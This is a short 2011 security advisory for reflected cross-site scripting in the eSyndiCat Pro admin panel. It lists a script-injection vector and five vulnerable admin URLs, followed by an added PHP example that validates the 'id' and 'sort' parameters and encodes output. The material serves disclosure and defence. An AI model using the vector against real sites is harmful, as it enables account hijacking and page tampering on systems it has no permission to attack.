eSyndiCat Pro version 2.3.05 suffers from a cross-site scripting vulnerability.
################################################################################################
# Exploit Title: eSyndiCat Pro v2.3.05 Cross-Site Scripting (XSS)
# Script Page : https://www.esyndicat.com
# Date: 24:11:2011
# Author : RandomStorm - https://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista (IE9 - Firefox 8.0)
# Note: Redirect and HTML injection can also be performed
# Vendor has been alerted!
################################################################################################
# POC:
# Admin Panel
# Vector: "><script>alert('XSS')</script>
# https://www.esyndicat.com/demo/admin/controller.php?file=admins&do=edit&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?file=suggest-category&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS
# Screenshot: https://i.imgur.com/bsesB.jpg
################################################################################################
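
Added example, not eSyndiCat code and not part of the original advisory: one way to handle the `id` and `sort` parameters listed in the POC, validating them on input and encoding them on output. The helper names (`h`, `clean_id`, `clean_sort`), the sortable column list and the sample requests are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not eSyndiCat code. They cover the two parameters
// the advisory lists as injectable: `id` and `sort`.

/** Encode a value for an HTML text node or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Accept `id` only as a positive integer; anything else yields null. */
function clean_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (id[]=...) or a missing parameter
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Accept `sort` only if it is one of the known column names (assumed list). */
function clean_sort($raw, array $allowed, string $default): string
{
    return (is_string($raw) && in_array($raw, $allowed, true)) ? $raw : $default;
}

// Constructed sample requests: the advisory's vector and a normal value.
$samples = [
    ['id' => '"><script>alert(\'XSS\')</script>', 'sort' => '"><script>alert(\'XSS\')</script>'],
    ['id' => '42', 'sort' => 'title'],
];
$sortable = ['id', 'title', 'date']; // assumed column names

foreach ($samples as $query) {
    $id   = clean_id($query['id'] ?? null);
    $sort = clean_sort($query['sort'] ?? null, $sortable, 'id');

    if ($id === null) {
        // Reject instead of echoing the raw value back into the page.
        echo "400 Bad Request: invalid id\n";
        continue;
    }
    // Even validated values are encoded at the point of output.
    printf("<input type=\"hidden\" name=\"id\" value=\"%s\">\n", h((string) $id));
    printf("<span class=\"sort\">%s</span>\n", h($sort));
}
```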